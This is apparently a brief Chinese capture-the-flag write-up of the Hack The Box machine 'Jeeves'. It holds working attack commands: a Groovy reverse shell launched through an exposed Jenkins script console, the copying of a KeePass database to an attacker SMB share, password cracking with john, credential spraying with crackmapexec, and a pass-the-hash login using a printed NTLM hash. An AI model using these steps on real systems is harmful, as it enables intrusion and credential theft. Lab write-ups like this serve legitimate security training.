nmap 扫起
可见445smb,先nmap脚本看一看
nmap -p 445 --script vuln 10.10.10.63
似乎没什么
另外看到端口50000,理论上冷门高端口应该是就是突破点
dirbuster干他
扫到askjeeves ,进去看到是jenkins
那就根据脚本script console来突破了
https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76#file-revsh-groovy
根据里面的方法来,修改ip等
本机开启监听,就可以收到了
深挖,发现这个:
看到ceh.kdbx这个文件,不清楚,网上搜要安装keepass2 解读(apt-get install keepass2)
但先要把它给弄到本机,试了几种方法都不行,smbserver倒是可以
在我之前弄好了的imacket-master(https://github.com/SecureAuthCorp/impacket)里:
python smbserver.py Share ‘/root/htb/jeeves’
然后在监听的shell里copy CEH.kdbx \10.10.14.57\Share,成功收到文件
收到文件后,keepass2john CEH.kdbx > keepass.hash
再用john解密
安装好keepass2,运行,打开这个kdbx,输入密码,里面找到很多密码一一记录到pass.txt
自动跑批破解,因为445端口开了嘛,干活,试试哪个是管理员
crackmapexec smb 10.10.10.63 -u Administrator -p pass.txt
啥比都没用
好吧,最后那个看起来是hash,换种方法,把他放到hash.txt
crackmapexec smb 10.10.10.63 -u Administrator -H hash.txt
这回提示ok了,用这个登录
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
搞定
最后root.txt还玩了个花活
dir /R
powershell Get-Content -Path “hm.txt”-Stream “root.txt”